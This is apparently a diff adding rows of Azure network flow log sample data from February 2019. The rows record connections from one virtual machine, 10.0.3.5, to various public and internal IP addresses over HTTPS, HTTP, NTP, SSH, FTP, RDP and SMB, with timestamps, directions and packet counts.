+889,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:12.748,2019-02-12 20:09:00.000,2019-02-12 20:30:59.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '40.121.3.131', '20.38.98.100', '168.62.32.212']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.239.152.10,4.0
+847,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.185,2019-02-12 20:09:35.000,2019-02-12 20:19:46.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.80.145.38', '40.87.63.92']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,eastus,eastus,40.87.63.92,2.0
+846,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.185,2019-02-12 20:09:35.000,2019-02-12 20:19:46.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.80.145.38', '40.87.63.92']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,eastus,eastus,40.80.145.38,2.0
+956,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,23.47.27.169,5.0
+960,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,65.55.163.78,5.0
+959,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,172.217.15.78,5.0
+957,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,65.55.163.76,5.0
+958,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:14.373,2019-02-12 20:10:42.000,2019-02-12 20:39:48.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.47.27.169', '65.55.163.76', '172.217.8.3', '172.217.15.78', '65.55.163.78']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,172.217.8.3,5.0
+902,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.076,2019-02-12 20:19:34.000,2019-02-12 20:19:41.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['131.107.147.209'],,,T,ms-wbt-server,3389.0,I,0.0,2.0,0.0,0.0,,eastus,131.107.147.209,2.0
+899,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:13.060,2019-02-12 20:19:53.000,2019-02-12 20:19:53.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.74.179.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,13.74.179.117,1.0
+913,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.170,2019-02-12 20:30:17.000,2019-02-12 20:30:17.000,2019-02-12 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['90.130.70.73'],,,T,ftp,21.0,O,1.0,0.0,0.0,0.0,,eastus,90.130.70.73,1.0
+944,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 21:23:18.732,2019-02-12 20:41:04.000,2019-02-12 20:41:04.000,2019-02-12 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.252.190'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westus2,eastus,65.55.252.190,1.0
+952,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:02:18.000,2019-02-12 21:59:22.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,43.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,43.0
+953,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:02:18.000,2019-02-12 21:59:22.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,43.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,43.0
+970,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:17.189,2019-02-12 21:04:11.000,2019-02-12 21:46:51.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,5.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,5.0
+845,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.493,2019-02-12 21:09:14.000,2019-02-12 21:49:11.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,28.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,28.0
+844,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.493,2019-02-12 21:09:14.000,2019-02-12 21:49:11.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,28.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,28.0
+935,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.228,2019-02-12 21:09:36.000,2019-02-12 21:49:24.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.69.153.67', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,2.0
+934,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.228,2019-02-12 21:09:36.000,2019-02-12 21:49:24.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.69.153.67', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,40.69.153.67,2.0
+954,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:12:30.000,2019-02-12 21:58:34.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,7.0
+955,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.259,2019-02-12 21:12:30.000,2019-02-12 21:58:34.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,7.0
+968,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,99.84.104.63,7.0
+965,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,157.55.134.136,7.0
+967,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,72.21.81.200,7.0
+966,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.993,2019-02-12 21:49:24.000,2019-02-12 21:53:11.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.136', '204.79.197.200', '72.21.81.200', '99.84.104.63']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,,eastus,204.79.197.200,7.0
+849,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,99.84.106.178,10.0
+850,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.3.13.106,10.0
+851,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,99.84.106.27,10.0
+853,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.45.180.234,10.0
+854,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,99.84.106.92,10.0
+855,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,72.21.81.240,10.0
+856,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.3.13.146,10.0
+852,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:52:59.000,2019-02-12 21:54:06.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['99.84.106.178', '23.3.13.106', '99.84.106.27', '23.3.13.112', '23.45.180.234', '99.84.106.92', '72.21.81.240', '23.3.13.146']",,,T,http,80.0,O,10.0,0.0,0.0,0.0,,eastus,23.3.13.112,10.0
+883,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.556,2019-02-12 21:53:05.000,2019-02-12 21:53:33.000,2019-02-12 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.68.226.108'],,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus,eastus,13.68.226.108,6.0
+943,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.024,2019-02-12 21:53:07.000,2019-02-12 21:53:27.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['46.43.34.31', '212.13.197.231']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,212.13.197.231,5.0
+942,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:06.024,2019-02-12 21:53:07.000,2019-02-12 21:53:27.000,2019-02-12 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['46.43.34.31', '212.13.197.231']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,46.43.34.31,5.0
+848,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.384,2019-02-12 21:54:04.000,2019-02-12 21:55:36.000,2019-02-12 22:00:00.000,IntraVNet,,,,,10.0.3.5,104.211.30.1,T,ssh,22.0,O,6.0,0.0,0.0,0.0,,eastus,104.211.30.1,6.0
+839,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:05.399,2019-02-12 21:55:43.000,2019-02-12 21:55:43.000,2019-02-12 22:00:00.000,IntraVNet,,,,,10.0.3.5,10.0.3.4,T,ssh,22.0,O,1.0,0.0,0.0,0.0,,eastus,10.0.3.4,1.0
+969,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 22:23:17.236,2019-02-12 21:55:43.000,2019-02-12 21:55:43.000,2019-02-12 22:00:00.000,IntraVNet,,,,,10.0.3.5,10.0.3.4,T,ssh,22.0,I,0.0,1.0,0.0,0.0,,eastus,10.0.3.5,1.0
+945,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.640,2019-02-12 21:59:58.000,2019-02-12 22:59:00.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,19.0
+946,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.640,2019-02-12 21:59:58.000,2019-02-12 22:59:00.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,19.0
+908,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:45.806,2019-02-12 22:02:27.000,2019-02-12 22:02:27.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.183.114.173'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westus2,eastus,52.183.114.173,1.0
+870,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:59.499,2019-02-12 22:03:55.000,2019-02-12 22:55:07.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+885,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.937,2019-02-12 22:08:42.000,2019-02-12 22:20:48.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,8.0
+884,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.937,2019-02-12 22:08:42.000,2019-02-12 22:20:48.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,8.0
+872,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.358,2019-02-12 22:10:15.000,2019-02-12 22:58:35.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+873,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.358,2019-02-12 22:10:15.000,2019-02-12 22:58:35.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.79.85.125,5.0
+874,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.358,2019-02-12 22:10:15.000,2019-02-12 22:58:35.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+920,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.134,2019-02-12 22:11:32.000,2019-02-12 22:13:05.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['104.43.212.12', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,2.0
+919,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:47.134,2019-02-12 22:11:32.000,2019-02-12 22:13:05.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['104.43.212.12', '13.67.143.117']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,centralus,eastus,104.43.212.12,2.0
+840,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:45.890,2019-02-12 22:14:39.000,2019-02-12 22:19:42.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '20.38.98.100']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,52.239.152.10,2.0
+841,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:45.890,2019-02-12 22:14:39.000,2019-02-12 22:19:42.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.239.152.10', '20.38.98.100']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,2.0
+860,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:59.515,2019-02-12 22:22:35.000,2019-02-12 22:55:37.000,2019-02-12 23:00:00.000,IntraVNet,,,,,10.0.3.5,104.211.30.1,T,ssh,22.0,O,12.0,0.0,0.0,0.0,,eastus,104.211.30.1,12.0
+921,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 23:23:46.837,2019-02-12 22:43:34.000,2019-02-12 22:43:34.000,2019-02-12 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+816,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:01:55.000,2019-02-12 23:58:05.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+821,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:08:42.000,2019-02-12 23:58:36.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+822,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:08:42.000,2019-02-12 23:58:36.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+819,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:12:11.000,2019-02-12 23:46:19.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+820,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:28:35.000,2019-02-12 23:28:35.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+817,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:29:35.000,2019-02-12 23:29:35.000,2019-02-13 00:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+818,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 00:23:33.301,2019-02-12 23:53:50.000,2019-02-12 23:53:50.000,2019-02-13 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+825,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.618,2019-02-13 00:03:23.000,2019-02-13 00:54:35.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+823,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.618,2019-02-13 00:04:27.000,2019-02-13 00:54:23.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+828,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:13:36.000,2019-02-13 00:58:37.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.79.85.125,5.0
+827,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:13:36.000,2019-02-13 00:58:37.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.79.85.125']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+824,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.618,2019-02-13 00:38:42.000,2019-02-13 00:53:42.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+826,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:39:33.000,2019-02-13 00:47:33.000,2019-02-13 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,2.0
+830,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:55:10.000,2019-02-13 00:57:33.000,2019-02-13 01:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,I,0.0,3.0,0.0,0.0,,eastus,10.0.3.4,3.0
+829,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:55:10.000,2019-02-13 00:57:33.000,2019-02-13 01:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,O,3.0,0.0,0.0,0.0,,eastus,10.0.3.5,3.0
+810,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 00:59:51.000,2019-02-13 01:56:01.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+811,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:08:43.000,2019-02-13 01:08:43.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+812,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:11:39.000,2019-02-13 01:45:47.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+814,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:11:50.000,2019-02-13 01:58:37.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+815,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:11:50.000,2019-02-13 01:58:37.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+813,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:29:01.000,2019-02-13 01:29:01.000,2019-02-13 02:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.8.3'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.8.3,1.0
